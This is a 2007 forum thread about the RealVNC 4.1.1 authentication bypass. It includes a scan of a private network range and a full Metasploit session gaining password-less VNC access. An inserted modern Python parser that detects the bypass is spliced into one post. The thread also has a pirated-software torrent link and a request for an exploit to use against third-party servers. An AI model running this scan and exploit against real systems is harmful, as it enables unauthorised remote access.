Real VNC 4.1.1
theprez98
07-08-2007, 04:44 AM
In doing some background research related to this (http://forums.remote-exploit.org/showthread.php?t=7421) thread, I'm looking for a copy of Real VNC 4.1.1 (Windows version). The current version on the website is 4.1.2, and 4.1.1 is not among the "previous" versions (because of the known exploit).
If I can set up a copy on my Windows box, I'll be able to validate the VNC bypass scanner included with BT2, as well as the specific Metasploit exploit.
If anyone has a copy of this or can point me to one, please let me know.
streaker69
07-08-2007, 04:51 AM
I might have a copy. I'll let you know later tonight.
I stopped using REAL VNC a while ago and now I only use TightVNC.
pureh@te
07-08-2007, 04:57 AM
In doing some background research related to this (http://forums.remote-exploit.org/showthread.php?t=7421) thread, I'm looking for a copy of Real VNC 4.1.1 (Windows version). The current version on the website is 4.1.2, and 4.1.1 is not among the "previous" versions (because of the known exploit).
If I can set up a copy on my Windows box, I'll be able to validate the VNC bypass scanner included with BT2, as well as the specific Metasploit exploit.
If anyone has a copy of this or can point me to one, please let me know.
prez, I'm pretty sure I at least have the viewer, which is the vulnerable program. I'm not sure if I have the server. I'm on my phone, but if you PM me an email address or something I'll send it to you if you still need it. The UltraVNC viewer is vulnerable too.
theprez98
07-08-2007, 04:59 AM
I might have a copy. I'll let you know later tonight.
I stopped using REAL VNC a while ago and now I only use TightVNC.
I only use Tight VNC too (actually, I use LogMeIn almost exclusively now), but I wanted to play around with it.
pureh@te
07-08-2007, 05:02 AM
http://btjunkie.org/torrent/Real-VNC-Enterprise-Edition-v4-1-9/43242f31dc3a589098bb766d79dced86139fb87490c4
theprez98
07-08-2007, 05:10 AM
Thanks for the replies guys, I have a copy now. ;)
balding_parrot
07-08-2007, 05:32 AM
http://btjunkie.org/torrent/Real-VNC-Enterprise-Edition-v4-1-9/43242f31dc3a589098bb766d79dced86139fb87490c4
Hmmm.... promoting illegal activities, I see ..... :rolleyes:
theprez98
07-08-2007, 05:36 AM
bt vnc # VNC_bypauth -p 5900 -i 192.168.1.1-192.168.1.255 -vnc -vv
================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
====================================================[linux]==
FOUND PORT IP STATUS THREADS TOTAL/REMAINING
192.168.1.113 :5900 vnc4:VULNERABLE
F:1 P:255 I:255 S:100% TH:0 0:00:00
Using the RealVNC 4.1.1 Bypass Authentication Scanner, I locate an IP running the vulnerable version.
bt ~ # cd /pentest/exploits/framework2/
bt framework2 # msfconsole
(The exploit is not available with Metasploit 3...don't know why)
msf > use realvnc_41_bypass
msf realvnc_41_bypass > set LHOST 127.0.0.1
LHOST -> 127.0.0.1
msf realvnc_41_bypass > set RHOST 192.168.1.113
RHOST -> 192.168.1.113
msf realvnc_41_bypass > exploit
Waiting for VNC connections to 127.0.0.1:5900...
Connected to RFB server, using protocol version 3.7
Proxying data between the connections...
And it's all over.
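The session above shows the bypass from the attacker's side: the Metasploit module connects, the RealVNC 4.1.1 server offers only VNC Authentication, the client answers with security type None, and the server accepts it. As an added example (not code from this thread, from RealVNC, or from Metasploit), here is a small Python parser for the RFB 3.7 security negotiation, run over constructed handshake byte strings, that flags exactly that pattern on the wire; the message layout follows the public RFB protocol specification, and the function names and sample bytes are my own.

```python
"""
Parse the RFB 3.7 security negotiation and flag the pattern behind the
RealVNC 4.1.1 authentication bypass: the client selects security type 1
(None) although the server only offered type 2 (VNC Authentication).

Message layout (RFB 3.7 and later):
  server -> client : "RFB 003.007\n"            (12-byte version banner)
  client -> server : "RFB 003.007\n"            (client's chosen version)
  server -> client : U8 count, count x U8 type  (offered security types)
  client -> server : U8 type                    (client's choice)
All byte strings below are constructed samples, not real captures.
"""
import struct

SEC_NONE = 1
SEC_VNC_AUTH = 2
SEC_NAMES = {0: "Invalid", SEC_NONE: "None", SEC_VNC_AUTH: "VNC Authentication"}


def parse_version(banner: bytes):
    """Parse a 12-byte 'RFB xxx.yyy\\n' banner into (major, minor)."""
    if len(banner) < 12 or banner[:4] != b"RFB " or banner[11:12] != b"\n":
        raise ValueError("not an RFB version banner")
    return int(banner[4:7]), int(banner[8:11])


def parse_server_security_types(msg: bytes):
    """Return the list of security types the server offered.

    A count of zero means the server refused the connection; it is then
    followed by a U32 length and a reason string."""
    count = msg[0]
    if count == 0:
        reason_len = struct.unpack(">I", msg[1:5])[0]
        reason = msg[5:5 + reason_len].decode(errors="replace")
        raise ValueError("server refused connection: " + reason)
    return list(msg[1:1 + count])


def server_should_accept(offered, chosen):
    """The check a correct server performs before honouring the client's
    choice: the type must be one the server itself offered. A server that
    skips this check is what the bypass relies on."""
    return chosen in offered


def analyse_handshake(server_banner, client_banner, server_types_msg, client_choice_msg):
    """Return a verdict dict for one captured negotiation."""
    smaj, smin = parse_version(server_banner)
    cmaj, cmin = parse_version(client_banner)
    if (cmaj, cmin) < (3, 7):
        # In RFB 3.3 the server dictates the security type and the client
        # makes no choice, so there is nothing to compare.
        raise ValueError("client negotiated RFB 3.3; no client choice to inspect")
    offered = parse_server_security_types(server_types_msg)
    chosen = client_choice_msg[0]
    verdict = {
        "server_version": f"{smaj}.{smin}",
        "client_version": f"{cmaj}.{cmin}",
        "offered": [SEC_NAMES.get(t, str(t)) for t in offered],
        "chosen": SEC_NAMES.get(chosen, str(chosen)),
        "alert": None,
    }
    if not server_should_accept(offered, chosen):
        verdict["alert"] = "client selected a security type the server did not offer"
    elif chosen == SEC_NONE:
        verdict["alert"] = "server offers unauthenticated access (security type None)"
    return verdict


# Constructed sample exchanges: (server banner, client banner, offered types, choice).
SAMPLES = {
    "normal": (b"RFB 003.007\n", b"RFB 003.007\n",
               bytes([1, SEC_VNC_AUTH]), bytes([SEC_VNC_AUTH])),
    "bypass_attempt": (b"RFB 003.007\n", b"RFB 003.007\n",
                       bytes([1, SEC_VNC_AUTH]), bytes([SEC_NONE])),
    "no_auth_configured": (b"RFB 003.008\n", b"RFB 003.008\n",
                           bytes([2, SEC_NONE, SEC_VNC_AUTH]), bytes([SEC_NONE])),
}


def run_samples():
    """Analyse every constructed sample and return name -> verdict."""
    return {name: analyse_handshake(*msgs) for name, msgs in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:20s} offered={verdict['offered']} chosen={verdict['chosen']}"
              f" alert={verdict['alert']}")
```

The useful signal for a defender is the `alert` value: a client choosing a type the server never offered is the bypass attempt itself, while a server that offers None at all is a configuration weakness worth a separate finding. The same comparison, done server-side in `server_should_accept`, is the check whose absence made 4.1.1 exploitable.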
Barry
07-08-2007, 12:36 PM
Hmmm, we use Dameware and Apple Remote desktop for all our remote viewing/fixing things at work. Looks like I'm going to have to do a little snooping/research.
pureh@te
07-08-2007, 05:48 PM
Hmmm.... promoting illegal activities, I see ..... :rolleyes:
Not really, as the source code for the older versions of VNC viewer was available to the public.
vsotolkanachinaietsa
07-13-2007, 08:50 PM
I was asking you because I wanted the exploit which had huge options,
and then I would modify it as I wanted.
This exploit, as you said, did not appear on the first page of the website.
I was looking for it, and finally when I found it, the link was "out of the time."
It was in the download center of purdue.edu; now I can't find it on their site again.
You can see it on milw0rm's site. It's too simple:
The attacker modifies the EXPLOIT as he/she wants and then checks some site based on Windows (2003 server). Finally, when he finishes checking the site, the already modified exploit will be sent automatically.
That's all, and then the attacker can connect using VNC's fullscreen without any password request.
And finally these ports (5900, 5800, 5801) will open with TCP.
Can someone guess what I wrote?
It was on PASSIVEMODE's site, but now I can't reach any file. The server is still working, but it is impossible to reach any file.
The same exploit was even on purdue.net, but you would have to register as their PDF file described. But I can't register on their site.
Purdue is a huge site of an INDIA university, and there are some sites including other articles or structure.
Can someone help me?
theprez98
07-13-2007, 08:54 PM
I was asking you because I wanted the exploit which had huge options,
and then I would modify it as I wanted.
This exploit, as you said, is not previewed on the first page of the website.
I was looking for it, and finally when I found it, the link was "out of the time."
It was in the download center of purdue.edu; now I can't find it on their site again.
You can see it on milw0rm's site. It's too simple:
The attacker modifies the EXPLOIT as he/she wants and then checks some site based on Windows (2003 server). Finally, when he finishes checking the site, the already modified exploit will be sent automatically.
That's all, and then the attacker can connect using VNC's fullscreen without any password request.
And finally these ports (5900, 5800, 5801) will open with TCP.
Can someone guess what I wrote?
It was on PASSIVEMODE's site, but now I can't reach any file. The server is still working, but it is impossible to reach any file.
The same exploit was even on purdue.net, but you would have to register as their PDF file described. But I can't register on their site.
Purdue is a huge site of an INDIA university, and there are some sites intended for other articles or structure.
Can someone help me?
I have no clue whatsoever about what you just said.
There is nothing to download. The exploit is already contained within Metasploit v2.7.
For the record, Purdue is in Indiana, not India, and is not part of any other university, but a full-fledged university by itself.
PrairieFire
07-13-2007, 09:00 PM
Thanks theprez98,
This is a very good proof of concept that should be somewhat safe to show here considering anyone who uses Real VNC more than likely has updated since this was discovered.
theprez98
07-13-2007, 09:15 PM
Thanks theprez98,
This is a very good proof of concept that should be somewhat safe to show here considering anyone who uses Real VNC more than likely has updated since this was discovered.
In addition, it's a very simple tutorial on using Metasploit as well. It works just as easily with the web interface. Even though there is already such a video, I may make a short video of it just for fun.
-=Xploitz=-
07-13-2007, 09:31 PM
In addition, it's a very simple tutorial on using Metasploit as well. It works just as easily with the web interface. Even though there is already such a video, I may make a short video of it just for fun.
Please do prez, I'm XTREM-ly curious about your skills involving -=Xploitz=- in general. :cool:
BTW... @ Everyone else..
I got first dibs on seeing this video first! ;)
vsotolkanachinaietsa
07-15-2007, 10:17 PM
Look at this: fresh.t-systems-sfr.com/cgi-bin/warex?unix/src/misc/vnc-4_1_2-unixsrc.tar
This is the second version of them, but there are too many errors.
The attacker was working in BT1, but I wasn't able to send the already modified exploit. :(
I have written to milw0rm's founder about this exploit and he replied to me:
Hey brotha,
Just view source and look for the string str0ke213 :) That should get
you the url.
/str0ke
I couldn't find any string file. It was only on milw0rm.com/sploits/05162006-BL4CK-vncviewer-authbypass.rar
-----------------
Can someone find the string line?
vsotolkanachinaietsa
07-15-2007, 10:19 PM
Also, there are many errors.
One of them is VNCviewer; it doesn't work perfectly.